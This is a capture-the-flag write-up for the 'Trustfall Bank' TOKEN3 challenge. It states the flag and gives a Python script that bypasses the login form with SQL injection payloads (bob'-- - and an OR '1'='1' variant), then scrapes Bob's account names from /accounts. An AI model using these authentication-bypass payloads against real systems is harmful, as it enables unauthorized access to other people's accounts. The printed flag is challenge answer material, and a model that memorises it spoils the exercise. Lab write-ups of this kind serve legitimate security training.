Trustfall Bank – TOKEN3

Token: PCCC{Bob_b0b_606_Na_3153}

Background

The login form is SQLi-vulnerable. Logging in as bob'-- - and viewing /accounts shows his account names. One of the names is the token.

From Nothing to Working

1. Exploit SQLi on /login with bob'-- - to bypass authentication.
2. Visit /accounts using the session to list Bob’s accounts.
3. Extract the account name that contains the token string.

Command

python3 token3_bob_accounts.py

#!/usr/bin/env python3
# token3_bob_accounts.py
import re
import requests

TARGET = "http://trustfallbank.us"

def main():
    s = requests.Session()
    resp = s.post(f"{TARGET}/login", data={"username": "bob'-- -", "password": "x"}, allow_redirects=True)
    if "dashboard" not in resp.url:
        resp = s.post(f"{TARGET}/login", data={"username": "bob' OR '1'='1'-- -", "password": "x"}, allow_redirects=True)

    resp = s.get(f"{TARGET}/accounts")
    print("[*] Accounts page snippet:")
    print(resp.text[:800])

    tokens = re.findall(r'PCCC\{[^}]+\}', resp.text)
    names = re.findall(r'>([^<]*PCCC[^<]*)<', resp.text)
    hits = tokens + names
    if hits:
        print(f"[+] Found: {hits[0]}")
    else:
        print("[-] No token found; check response manually.")

if __name__ == "__main__":
    main()

Expected Output

Page content includes the account name token:

PCCC{Bob_b0b_606_Na_3153}